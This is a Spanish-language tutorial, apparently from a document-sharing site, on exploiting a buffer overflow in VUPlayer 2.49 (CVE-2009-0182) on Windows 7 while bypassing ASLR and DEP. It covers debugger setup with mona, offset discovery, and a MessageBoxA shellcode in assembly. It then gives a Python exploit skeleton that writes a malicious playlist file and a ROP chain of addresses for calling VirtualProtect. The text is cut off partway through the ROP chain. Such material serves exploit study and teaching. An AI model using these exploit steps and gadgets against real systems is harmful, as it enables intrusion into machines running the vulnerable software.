ASLR Win7 Shellcode Exploit Pekeinfo

  • View
    31

  • Download
    4

Embed Size (px)

DESCRIPTION

exploit

Text of ASLR Win7 Shellcode Exploit Pekeinfo

  • ADVERTENCIA:

    Al abrir este documento, el lector acepta incondicionalmente su total y exclusiva

    responsabilidad legal, de acuerdo a las leyes vigentes en su pas, por el uso de las

    tcnicas experimentales, educativas y de investigacin aqu expuestas en materia de

    explotacin especializada de sistemas. En caso de no estar de acuerdo con alguno de los

    puntos descriptos, deber eliminar inmediatamente el presente documento y todo

    material asociado al mismo. Este tutorial es solo con fines didcticos y como

    conocimiento de la informtica en general, el

    Autor de esta obra NO se hace responsable del uso indebido e ilegal de los

    conocimientos aqu Expuestos.

    Autor: Guillermo Campillo

    Contacto: pekeinfo[at]Gmail[dot]com

    Twitter: @PekeinfoPkaos

  • Contenido Prerrequisitos ................................................................................................................................ 3

    Introduccin .................................................................................................................................. 3

    Preparando el camino. .............................................................................................................. 3

    Instalacin de Immunity debugger ....................................................................................... 3

    Instalando y configurando mona .......................................................................................... 3

    Instalacin de VUPlayer ........................................................................................................ 3

    Conociendo el camino ................................................................................................................... 4

    Qu es ASLR? ........................................................................................................................... 4

    Mtodos para evadir ASRL ........................................................................................................ 5

    Explotando la vulnerabilidad ......................................................................................................... 5

    Entendiendo el fallo .................................................................................................................. 5

    Creando el esqueleto del exploit. ............................................................................................. 8

    Evadiendo la proteccin DEP .................................................................................................... 8

    Creando la Shellcode ................................................................................................................... 10

    Objetivo ................................................................................................................................... 10

    Obteniendo la Imagen Base de Kernell32 ............................................................................... 10

    Buscando la Export Table Address .......................................................................................... 11

    Buscando la Direccion de WinExec ......................................................................................... 12

    Obteniendo La direccin Real de WinExec ............................................................................. 12

    Haciendo uso de de WinExec ................................................................................................. 13

    EXPLOIT ....................................................................................................................................... 13

  • Prerrequisitos

    Programa: VUPlayer 2.49 CVE: CVE-2009-0182 Sistema: Windows 7 64 Herramientas:

    Immunity debugger con complemento mona. Dificultad: Se necesitan conocimientos previos

    Introduccin

    Preparando el camino.

    Instalacin de Immunity debugger

    Bueno lo primero es instalar el Immunity debugger. Este tambin nos instalara python en caso

    de no tenerlo instalado. Tras terminar la instalacin de Immunity debugger,

    Instalando y configurando mona

    Instalaremos el complemento mona, que podemos descargar desde el proyecto oficial.

    http://redmine.corelan.be/projects/mona

    Para instalarlo basta con descargarlo y copiar el fichero mona.py en la carpeta del Imunity

    debugger. Por defecto es: C:\Archivos de programa\Immunity Inc\Immunity Debugger\PyCommands

    Posteriormente configuraremos nuestro entorno de trabajo. Iniciamos el Inmunity y en la barra

    de comandos ponemos lo siguiente: !mona config -set workingfolder c:\logs\%p. Sin comillas.

    Esto nos generara un espacio de trabajo donde almacenara toda la informacin referente al

    programa

    Instalacin de VUPlayer

    Este programa no requiere ninguna instalacin especial.

  • Conociendo el camino

    Qu es ASLR? Son las siglas de Address space layout randomization, consiste en colocar determinadas partes

    de un programa en diferentes direcciones de memoria, haciendo ms difcil la tarea de

    explotacin de un programa por parte de un exploit, esta tcnica fue publicada en el 2001 en pax

    (http://en.wikipedia.org/wiki/PaX), pero realmente hasta el 2005 no se habilito por defecto en el

    kernel, en 2007 Windows lo incluyo en su sistema operativo Windows vista, aun que el sistema

    que usa Windows de ASLR no es igual que el del resto de sistemas operativos, en Windows el

    ASLR se aplica a las localizaciones de: heap, stack, PEB y TEB.

    Esto se traduce en que ya no se puede predecir en qu posicin estar la direccin de la funcin

    a la que queremos llamar, si nos fijamos en alguno de los tutoriales mos anteriores veremos que

    muchas direcciones son colocadas a mano como por ejemplo la de VirtualProtect, pero con

    ASLR esto no lo podemos realizar de esta forma, un ejemplo de cmo afecta ASLR a la

    creacin de shellcode pondremos una shellcode sencilla

    Este es el cdigo que usare, simplemente hace un msg con el ttulo pekeinfo y el texto pekeinfo

    XOR EAX,EAX

    PUSH EAX

    PUSH 696E666F

    PUSH 656B6570

    MOV EBX,ESP

    PUSH EAX

    PUSH EBX

    PUSH EBX

    PUSH EAX

    CALL 760EFD56

    Ahora bien si reinicio la maquina e intento lanzar nuevamente mi shellcode pasa lo siguiente.

    Como vemos la direccin 0x76EFD56 que era la direccin de la API MessageBoxA, ha

    cambiado. Y es ah donde nos afecta

  • Mtodos para evadir ASRL

    Entonces como evadimos el ASLR? pues aunque hemos visto que ASLR nos dificulta la tarea

    existen mtodos para saltarse esta proteccin entre ellos existe una manera que consisten en

    lanzar mltiples veces un exploit hasta que d con la direccin correcta, esto en muchos casos

    no es viable dado el problema de estabilidad que genera, pero es una opcin.

    Otra opcin y la que se explicara en este documento es la obtencin de la direccin base de

    kernel32 mediante PEB, esta tcnica se conoce desde antes del 2009, y bsicamente es obtener

    la ImagenBase de Kernell32 mediante la estructura PEB para poder desplazarnos y obtener

    alguna de las APIs que son ms interesantes como por ejemplo LoadLibraryA. En la imagen se

    puede ver un resumen ms esquemtico de este proceso

    Explotando la vulnerabilidad

    Entendiendo el fallo

    El exploit en esta ocasin es un exploit de tipo buffer OverFlow .

    El poc es bastante descriptivo, el programa falla cuando intenta leer una url de un fichero pls,

    pues vamos a ver como es un fichero valido pls, abrimos un fichero de texto y ponemos una url

    valida, ejemplo: http://miwebvalida.net guardamos el fichero y renombramos el fichero como

    pls, ahora abrimos el programa y abrimos el fichero

  • Bien ahora abramos el immunitydbg y creemos mediante mona un fichero de muchos

    caracteres, yo he empezado con 1024 por probar,

    Copiamos el buffer en nuestro fichero pls, y lo abrimos con el VUPlayer.

    Ahora cogemos los dgitos amarillos y se lo damos a mona po 68423768

    Con esto sabemos el tamao que necesitamos para sobrescribir el ret, el tamao es de 1012,

    ahora solo nos queda encontrar el RET donde falla, abrimos el immunitydbg y cargamos el

    programa, para encontrar el RET yo suelo ejecutar con normalidad el programa y espero a que

    haga crash

  • Bien cuando el immunitydbg pare por la excepcin simplemente nos fijamos en el stack

    subimos y la primera direccin del programa que veamos le ponemos un BP

    Y vamos traceando desde esa direccin

    Pues ya llegamos a nuestro ret,

  • Creando el esqueleto del exploit.

    El exploit lo hare en Python por comodidad, y ser algo como esto:

    import struct

    rop =[]

    shellcode="";

    x = 0

    f = open("vulnerable.m3u","a")

    for x in range(0,1012):

    f.write("\x90")

    rop_gadgets = struct.pack("

  • rop =[

    0x10015f82, # POP EAX # RETN [BASS.dll]

    0x1060e25c, # ptr to &VirtualProtect() [IAT BASSMIDI.dll]

    0x1001eaf1, # MOV EAX,DWORD PTR DS:[EAX] # RETN [BASS.dll]

    0x10030950, # XCHG EAX,ESI # RETN [BASS.dll]

    0x10605ce4, # POP EBP # RETN [BASSMIDI.dll]

    0x100222c5, # & jmp esp [BASS.dll]

    0x10015f82, # POP EAX # RETN [BASS.dll]

    0xfffffdff, # Value to negate, will become 0x00000201

    0x10014db4, # NEG EAX # RETN [BASS.dll]

    0x10032f72, # XCHG EAX,EBX # RETN 0x00 [BASS.dll]

    0x10015f82,